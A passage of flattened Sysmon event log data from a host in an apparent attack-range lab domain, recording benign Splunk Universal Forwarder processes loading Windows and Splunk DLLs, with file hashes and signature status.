Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.892{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A246700376CEC3F571E7E9BC9829A9D4,SHA256=E2C5AA6080AB55DA6D5E8B0A4DB958BB86D511784E5E1897FE55C784AED0A3B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x8000000000000000100555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 